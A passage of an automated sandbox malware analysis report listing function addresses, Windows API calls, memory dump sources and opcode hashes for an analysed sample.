                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741A462D1878283F710EB709554369B360FBA43A4F908376E6AC03AD9DF7CA4E08761
                                                                                                                                                                                                                              Function 00007FF7EAD0CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction ID: ecca85b24874862a24e7183fb72d5a99607acda9a7379090796502f01be66a86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6313520E0810645FA14FB6594913B9AB82EF9178CFC444B7E94E4B2DFDE7CA805C273
                                                                                                                                                                                                                              Function 00007FF7EAD1013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: eec38f99bcf9f54e7f1c3a716ea1f693e33258882375edd9fc26d3db17decd87
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28510561B0924986F728FA7594007BAE381FF64BA4F8A4772DD6C437DDCE3CE5418622
                                                                                                                                                                                                                              Function 00007FF7EAD1C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction ID: 4c2bb2ce44d08f4f13883e68719424bf672e55fff0495f92f2f6dc96292bc4b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1511EF62A08A9281EA20EB25B800269A761EB51FF0F944372EE7D0B7ECCE7CD4508711
                                                                                                                                                                                                                              Function 00007FF8E81349CC Relevance: 3.0, APIs: 2, Instructions: 34networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1021210092-0
                                                                                                                                                                                                                              • Opcode ID: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                              • Instruction ID: c4f6b5c218138cd70d141fdd60a50347f7280eebec4664d271900c4a1227d846
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B014F21B18B4282E7109BB6E94422E73A0FF89BD4F514031EA5E93B64DF3CD495C709
                                                                                                                                                                                                                              Function 00007FF8E81356E8 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906013440closesocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4165350034-0
                                                                                                                                                                                                                              • Opcode ID: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                              • Instruction ID: c48d6182b324ab26af285c4de40c62b34954d2e895f7c365219ba6d24868d84d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF01922A18B41C2EA145BE6B5482AC6364BB49BF4F590331DA7E537E0CF3CE896C205
                                                                                                                                                                                                                              Function 00007FF7EAD1AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABC6
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction ID: d78c9e0a33182bb1b0867914edefaabed07851869f2b579fb04d35b1bfafe9fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5021C661B0C68241FA90F7B195943BD9382DFA4790FC842FBD92E477E9CE7CA4418322
                                                                                                                                                                                                                              Function 00007FF7EAD1BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction ID: c87750b423259ca73a37448cb9e3486c1050400a723d4ed49d439a6e0e6ad29a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD41B63291824587FB34EB39A540379F7A1EB65750F900172E68E836D9CF3DE402CBA2
                                                                                                                                                                                                                              Function 00007FF7EAD07F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: d1cf0969546e67d8c79be56f924a5aafafb037098b6e94a4944dfbd08bf1f1e7
                                                                                                                                                                                                                              • Instruction ID: 5eac34d143a98ddc1e11c8133e3d16fa8cc1d241fbf1b774b58bcddbc53cc607
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1cf0969546e67d8c79be56f924a5aafafb037098b6e94a4944dfbd08bf1f1e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33217121B1865146FA50FA2269443FAE752FF45BD8FC844B2EE4D0778ACEBDE051C712
                                                                                                                                                                                                                              Function 00007FF7EAD1B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                              • Instruction ID: ed6467542f1b89133117b0ef7db505fafeb9c32d2d00e86df438a2cb0da09135
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96317E72A1860285F711FB75884137DA7A0EFA0BA0FC101B7E91D033DADE7CA5428732
                                                                                                                                                                                                                              Function 00007FF7EAD15F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: e302266983d598e0663e992107c0094a23fbe487e1e9b27af0ad8e5690f3ba44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21116F65A1C64281FA61FF6194007B9E360EFA5B84FC444B3EA4C57A9ECF3CD4018762
                                                                                                                                                                                                                              Function 00007FF7EAD26354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction ID: 870eb6fc6106efc71abb7fd260fe0838bba690b09f9ed7633e88a6430e8dadb6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D21A132608B8186EB61EF28D440379B7A0FB84B54F9842B5EA5D876DDDF3CD401CB21
                                                                                                                                                                                                                              Function 00007FF7EAD103BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: 255d7391021efd3bdff95e3844f6d7295641bbccf7e78d129de294dd346b75f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D018261B0874940F504FB6299402A9E795FFA5FE0F894672DE5C17BDECE3CE4018311
                                                                                                                                                                                                                              Function 00007FF8E8136BEC Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                              • Opcode ID: f75e51da77dfc1082f19fe342fcab0b157519f4804096b52c81e4ca3d592fddb
                                                                                                                                                                                                                              • Instruction ID: ef273ee71972dec6e6a9638c7a26a905475f26c4bda3a3308901f3929aa819d7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f75e51da77dfc1082f19fe342fcab0b157519f4804096b52c81e4ca3d592fddb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24E012F2A14A8582DB289BA6E44426863A0F719FF4F245721CA381B3D0DE28D9E1C740
                                                                                                                                                                                                                              Function 00007FF7EAD08E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF7EAD06476,?,00007FF7EAD0336E), ref: 00007FF7EAD08EA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                              • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                              • Instruction ID: 0cd5ea4a23c9f484ed908a5932d86f5b3d9d597a6a239652499352a9af5477e4
